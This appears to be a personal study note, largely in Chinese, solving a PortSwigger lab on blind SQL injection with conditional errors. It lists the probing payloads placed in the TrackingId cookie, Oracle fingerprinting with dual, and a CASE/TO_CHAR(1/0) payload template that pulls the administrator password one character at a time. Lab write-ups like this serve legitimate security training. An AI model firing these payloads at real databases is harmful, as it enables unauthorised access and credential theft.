Subject
Lab: Blind SQL injection with conditional errors
Url: portswigger.net/web-securit…
Mind Palace
不论如何点击,带与不带cookie,页面(HTTP response)是没有任何变化的;那么我们尝试让他报点错
双引号正常回显 ==> 验证了TrackingId是注入点,并且可以通过报错信息进行帮助的condition判断
后续:
id' ==> Error
id'' ==> Error
id'||(select '')||' ==> Error
id'||(select '' from dual)||' ==> 正常回显 ==> Oracle数据库
id'||(select '' from qweasdzxc)||' ==> 不存在的table-name ==> Error ==> 注入点可用,利用方式:引出报错的盲注
'||(select '' from users where rownum=1)||'
'||(select '' from users where username='administrator')||'
==> 证明users表,username的administrator账户的存在
# 或 官方解法:
'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
id'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' ==> Success
id'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' ==> Error
==> 可以利用case语句和to_char(1/0)来制造报错
# 核心payload
id'||(select case when ascii(substr(password,{i},1))>{mid} then to_char(1/0) else '' end from users where username='administrator')||'
# 注:这里用substring没效果,使用substr
# ==> 获得administrator账户密码
exp代码
END (づ。◕‿‿◕。)づ
